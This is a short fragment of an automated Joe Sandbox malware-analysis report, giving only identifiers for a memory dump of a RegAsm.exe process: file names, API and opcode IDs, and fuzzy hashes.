                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MetricsSystem
                                                                  • String ID:
                                                                  • API String ID: 4116985748-3916222277
                                                                  • Opcode ID: 013dc761e4909440771d46bafdb638bb20e567719734dc29c98b96e9aaa0edbc
                                                                  • Instruction ID: 5819706d29ef5a07fa912cd141edfc67d55658e54de8dc311193a39933180409
                                                                  • Opcode Fuzzy Hash: 013dc761e4909440771d46bafdb638bb20e567719734dc29c98b96e9aaa0edbc
                                                                  • Instruction Fuzzy Hash: 5C319FB49182009FDB00EF78D985A1EBBF4BB89304F11853DE898D7360D774A949CF86